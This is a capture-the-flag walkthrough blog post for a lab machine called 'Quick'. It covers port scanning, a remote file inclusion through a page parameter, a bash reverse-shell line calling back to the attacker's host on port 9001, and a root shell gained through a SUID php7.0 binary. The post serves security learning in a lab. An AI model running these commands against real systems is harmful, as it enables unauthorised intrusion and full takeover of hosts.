Let’s try to solve the machine “Quick” from Hackmybox.
This is a simple machine, which has only port 80 is open and to get initial foothold you have to exploit RFI and to escalate the privilege use SUID binary.
I downloaded the machine and opened it in Oracle Virtual Box. To find the IP address of the box, I used netdiscover utility on Kali Linux. The target IP for me is 192.168.0.142.
Find open ports: nmap to scan find open ports and services running on it.
Only port open is 80.
Let’s try to find the web app running on port 80.
If you noticed the address bar it has http://IP?page=home which indicates that it might be possible to exploit Local File Inclusion(LFI) or Remote File Inclusion(RFI).
I first tried to fuzz the directories on the web server, but it did not find any directory. Then I checked for LFI, but it seems that application is not vulnerable to LFI.
After LFI, I tried RFI. To test that, started the simple http server on my machine using the command “python3 -m http.server 9090” and tried to access the URL from web app.
Above image indicates that it is possible to include the remote file from the web app.To further test this, I created a simple php file which echo back some text in brower which will indicate that it is possible to execute php code.
Let’s try to access this file and check if we see text “RFI exploit works”. The web application included Remote php file and I saw the above text in browser.
Now will host a php file which executes the os commands.Below is content of that file.
I am able to read the contents of /etc/passwd file using RFI.
Now I will create a bash file which when executed, provide me the shell on the box and download the file on the target machine in /tmp directory. Changed its permission to make it executable and the execute it.
sh -i >& /dev/tcp/192.168.0.135/9001 0>&1
Now start the netcat listener of Kali box on port 9001 and use RFI to get reverse shell and execute the above file, receive the shell on the netcat listener.
Privilege escalation: To find the way to escalate privilege used linpeas. In output of SUID binary section, found php7.0 as Unknown SUID binary!.
Let’s search GTFOBins for privilege escalation.
This shows that we can execute the command using php and get the shell. Used command cd /usr/bin;php7.0 -r “pcntl_exec(‘/bin/bash’,[‘-p’]);” to get the root shell.
Now lets check what is RFI:
Remote File Inclusion (RFI) is a type of vulnerability that allows attackers to exploit web servers by injecting malicious code into files hosted on remote servers.
RFI vulnerabilities typically occur when a web application dynamically includes files based on user-supplied input.
I think below code block is vulnerable which causes the RFI issue as it is directly taking the value of page.Also it is appending .php at the end that is why unable to get locl files using this
If you check this link, you will see the security warning.
So that’s the box hope you enjoy reading the post and like it.
See you soon with new box…..
